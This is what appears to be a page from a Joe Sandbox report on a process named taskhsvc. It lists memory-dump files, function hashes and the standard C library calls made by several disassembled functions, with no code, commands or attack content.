Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_faillisten
String ID:
API String ID: 4123369783-0
Opcode ID: 2928b3142329405076bca7751a119aab27c9f752a2ea5758dc7e0a23b424b1e1
Instruction ID: 9906d09d7054b50afeb951dd6d394a368b2b16ea57c28e7dbc7113b819d2ee28
Opcode Fuzzy Hash: 2928b3142329405076bca7751a119aab27c9f752a2ea5758dc7e0a23b424b1e1
Instruction Fuzzy Hash: 39111CB0904249DFCB00EF78C9456AEBBF0FB49324F508A19F4A597395D374A904DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6206 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 228
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 00EF6275
fclose.MSVCRT ref: 00EF628D
strerror.MSVCRT ref: 00EF62A6
_close.MSVCRT ref: 00EF6301
strerror.MSVCRT ref: 00EF6316
abort.MSVCRT ref: 00EF63BD
_unlink.MSVCRT ref: 00EF63D0
strerror.MSVCRT ref: 00EF63EE
strcmp.MSVCRT ref: 00EF6444
abort.MSVCRT ref: 00EF6481
strerror.MSVCRT ref: 00EF64AD
free.MSVCRT ref: 00EF6508
free.MSVCRT ref: 00EF6530
free.MSVCRT ref: 00EF6552
__stack_chk_fail.LIBSSP-0 ref: 00EF656C

Strings

5, xrefs: 00EF6471

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: strerror$abortfree$__stack_chk_fail_close_unlinkfclosestrcmp
String ID: 5
API String ID: 2086477376-54344023
Opcode ID: ae3c0fe66a2e303d7ba770ced38f2d8097e20f9893d5a477de08f8d4dfea53bf
Instruction ID: 0282b94389e9d16e89fb3e7848cfef21c48073f9cb0bc66ff816b45b62f908d3
Opcode Fuzzy Hash: ae3c0fe66a2e303d7ba770ced38f2d8097e20f9893d5a477de08f8d4dfea53bf
Instruction Fuzzy Hash: 86A1E6B4A043068FDB04EF69C585A6EBBF0BF48344F008869E9A4AB351D738E945DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6B1B Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 289
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 00EF6B85
strerror.MSVCRT ref: 00EF6BFE
__stack_chk_fail.LIBSSP-0 ref: 00EF6F50

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

_close.MSVCRT ref: 00EF6C73

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

_close.MSVCRT ref: 00EF6CDE

Strings

0, xrefs: 00EF6F28

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$_closestrrchr$abortstrerror
String ID: 0
API String ID: 1761883011-4108050209
Opcode ID: 613c57f2b315e198e8ccc741fd77145f27308e87cc914103fcb319a799501f47
Instruction ID: 16b5e0bbaa0ef63910da97d26857393928e23c8c7158727625967751c38b17a0
Opcode Fuzzy Hash: 613c57f2b315e198e8ccc741fd77145f27308e87cc914103fcb319a799501f47
Instruction Fuzzy Hash: 51D1C2B4A043098FDB14EFA8C58579DBBF0FB88314F149829E598EB354D739A984DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00DB980F Relevance: 20.0, APIs: 13, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00DB9C44

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DB984F

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failstrrchr$abortfree
String ID:
API String ID: 1003117597-0
Opcode ID: bf30430773064e320e5d2c89a2de1cb37e38d3c458c86b65c0d6ef0fd7e08c06
Instruction ID: 945b798503fe1b551048deaf9b562885dffb4cf7d068f1c2a2d965d576681395
Opcode Fuzzy Hash: bf30430773064e320e5d2c89a2de1cb37e38d3c458c86b65c0d6ef0fd7e08c06
Instruction Fuzzy Hash: 2432A074A05645CFDB00EFA9D085AADBBF0BF04310F098869F895DB356DB38E885DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D973E6 Relevance: 18.2, APIs: 12, Instructions: 153
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00D97403
strcmp.MSVCRT ref: 00D9741F
strcmp.MSVCRT ref: 00D97445
strcmp.MSVCRT ref: 00D97465
strcmp.MSVCRT ref: 00D97485
strcmp.MSVCRT ref: 00D974A1
strcmp.MSVCRT ref: 00D974BD
strcmp.MSVCRT ref: 00D974D9
strcmp.MSVCRT ref: 00D974F5

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 80849bdbfa56aa95ce49c5ab62bbdfa547ceb06c0e17be74b4ec522c10cc87bc
Instruction ID: 817e9b250cf76f439120fe11f8f0c487760e7bac2a549a7f0dc36db94a894214
Opcode Fuzzy Hash: 80849bdbfa56aa95ce49c5ab62bbdfa547ceb06c0e17be74b4ec522c10cc87bc
